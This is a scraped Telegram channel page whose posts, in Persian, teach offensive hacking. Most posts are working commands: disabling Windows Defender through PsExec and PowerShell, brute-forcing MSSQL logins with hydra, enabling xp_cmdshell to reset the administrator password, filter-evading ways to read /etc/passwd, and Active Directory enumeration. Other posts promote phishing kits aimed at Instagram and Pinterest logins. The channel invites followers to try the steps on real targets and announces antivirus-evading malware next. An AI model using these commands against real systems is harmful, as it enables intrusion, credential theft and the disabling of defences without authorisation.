RedTeam


Kanal geosi va tili: ko‘rsatilmagan, ko‘rsatilmagan
Toifa: ko‘rsatilmagan


Topics :
Red team (NetWork) ❗️
coding(c,python,powershell,bash)🧑‍💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
ransomware 👾
https://www.youtube.com/@RedTeam_APT

Связанные каналы

Kanal geosi va tili
ko‘rsatilmagan, ko‘rsatilmagan
Toifa
ko‘rsatilmagan
Statistika
Postlar filtri


Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
بریم برای مقدمات #Wireless_Hacking
۲ تا از ابزار هایی که تا ۲۴ ساعت اینده اموزش هاشو میذاریم مربوط به wireless attack میباشند که روش Evil Twin بیان و توضیحات و تست aircrack-ng , WifiPhisher داده میشه .
@RedTeamAPT


Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
disable defender on windows 10
غیر فعال کردن defender با دسترسی shell با ابزار psexec
که حتما راجب این ابزار و کارهایی که میشه باهاش انجام داد ویدیو جداگانه گرفته میشه
PsExec64.exe -i -h \\192.168.141.145 -u -p powershell "Set-MpPreference -DisableRealtimeMonitoring $true"
@RedTeamAPT


#PowerShell
به تعدا packets های ارسالی توجه کنید
مربوط به ویدیو آخر کانال
$ipAddress = "192.168.141.145" # Replace with the target IP address
$ports = @(80, 443, 21, 22, 53 , 389 , 2049 , 135 , 137 , 25 , 162 , 139 , 445 , 161, 500, 80 , 443) # Define the ports to scan

foreach ($port in $ports) {
$tcpClient = New-Object System.Net.Sockets.TcpClient
try {
$tcpClient.ConnectAsync($ipAddress, $port).Wait(100) # 100 ms timeout
if ($tcpClient.Connected) {
Write-Host "Port $port is OPEN on $ipAddress"
}
} catch {
Write-Host "Port $port is CLOSED or unreachable on $ipAddress"
} finally {
if ($tcpClient.Connected) {
$tcpClient.Close()
}
}
}
@RedTeamAPT


@RedTeamAPT
$ipAddress="192.168.141.145"; $port=445; (New-Object System.Net.Sockets.TcpClient).ConnectAsync($ipAddress, $port).Wait(100) ? "Port $port is OPEN" : "Port $port is CLOSED or unreachable"
#PowerShell


Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
@RedTeamAPT
#PowerShell
ممکنه گاهی فکر کنید یک سری از ابزار ها سر و صدای زیادی داره مانند nmap
ایا ابزار های جایگزین هست ؟
مقدمه ای بر استفاده از قطعه کد های بسیار مهم در مراحل انجام هک و تست نفوذ
@RedTeam


#commands
hydra -L users.txt -P password.txt mssql://192.168.141.145
sqsh -U sa -S 192.168.141.145
xp_cmdshell "net user administrator /active:yes"
xp_cmdshell "qeury session"
xp_cmdshell "net user administrator 123456"
xfreerdp /u:administrator /v:192.168.141.145
@RedTeamAPT


فعال کردن XP_cmdhell
EXECUTE sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
EXECUTE sp_configure 'xp_cmdshell', 1;
GO
RECONFIGURE;
GO
EXECUTE sp_configure 'show advanced options', 0;
GO
RECONFIGURE;
GO
@RedTeamAPT




Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
@RedTeamAPT
#SQLserver

آموزش ابزار های :
.
hydra
sqsh
.
چطوری user , password یک دیتابیس رو بدست بیاریم
بعد ازوصل شدن بهش چطوری به کل سیستم دسترسی بگیرم و administrator بشم
بالاتر از دسترسی adminstrator هم میشه گرفت ؟؟
.
@RedTeamAPT


hydra -L UserList.txt -P PassList.txt -t 4 mssql://192.168.1.100
hydra :
ابزاری برای به دست اوردن user , password که سرویس های مختلفی را پشتیباتی میکند , در عکس بالا user , password دیتابیس SQL با استفاده از این ابزار به دست امده است .
@RedTeamAPT


Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
به دست اوردن user , password از فایل passwd با دستورات گفته شده 😈😁
@RedTeamAPT


@RedTeamAPT
ابزار هایی که ما در روند attack , exploit قرار است استفاده کنیم :
1 - reconnaissance
2 - password & brute force attacks
3 - exploitation
4 - wireless attacks
5 - vulnerability scan
6 - post exploitation
7 - web app pen testing
8 - network based attacks
9 - social engineer & phishing
@RedTeamAPT


برای بدست اوردن فایل پسورد یوزر ها میشه ازین ۴ دستور هم استفاده کرد 💀😈
cat ${HOME:0:1}etc${HOME:0:1}passwd

`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`

cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

cat `xxd -r -ps


Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
@RedTeamAPT
#phishing

آموزش ابزار های :
.
zphisher
evilgnix2
.
این ابزار ها برای بدست اوردن یوزر و پسورد ۳۳ تا از برنامه و سایت های social media مناسب است
که ما داخل ویدیو بر رو سایت های :
instagram
pintrest
تست کردیم
source :
blueserver.ir
https://github.com/htr-tech/zphisher
https://github.com/kgretzky/evilginx2
bitly.com
.
@RedTeamAPT


دستورات و ابزار های ویدوی بالا :
@RedTeamAPT
winexe -U f.fazeli //192.168.141.138 cmd.exe
remmina -c rdp://administrator@192.168.141.139
xfreerdp /u:administrator /v:192.168.141.139
rpcclient -U administrator 192.168.141.138
@RedTeamAPT


Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
@RedTeamAPT
#active_directory
آموزش ابزار های :
xfreerdp
remmina
winexe
rpcclient
.
اموزش به دست اوردن تمام اطلاعات active directory
.
users
groups
.
@RedTeamAPT


غیر فعال کردن انتی ویروس با دسترسی local admin به وسیله powershell
.
@RedTeamAPT
Get-MPPreference
Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true
@RedTeamAPT


@RedTeamAPT
وقت عزیزان بخیر
لازم دونستم توضیحات در رابطه با mind map ما برای کانال بدم
ببینید هم از pentest و هم از red team موارد بیان میکنیم , تست های واقعی انجام میدیم , گاهی لوکال تست میکنیم و دوستان اگر خواستند میتوانند خودشون این مراحل رو روی target واقعی تست کنند .
عموما داخل ویدیو ها بیان میکنیم که این red team هست یا pentest
@RedTeamAPT
ما اوایل سعی بر این داریم تا اشنایی های لازم ایجاد بشه بعدش مباحث تخصصی تر رو شروع کنیم مثل اینکه من چطوری یک برنامه مخرب رو کامپایل کنم که انتی ویروس نشناستش یا چطوری از یک سیستم دسترسی دائمی بگیرم و...
ممنون از همراهی شما
#RedTeam
#Pentest
@RedTeamAPT


SysinternalsSuite.zip
50.8Mb
ابزار sysinternal برای انجام مراحل ویدیو اموزشی بالا
@RedTeamAPT


Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
@RedTeamAPT
توضیحات و مراحل انجام :
#enumeration
آموزش ابزار های :
ADexplorer
nmap -Sv , -sn , -p-
crackmapexec
nbtscan
اموزش به دست اوردن تمام اطلاعات active directory با یک یوزر معمولی !
policy
users
groups
systems
dns
@RedTeamAPT

20 ta oxirgi post ko‘rsatilgan.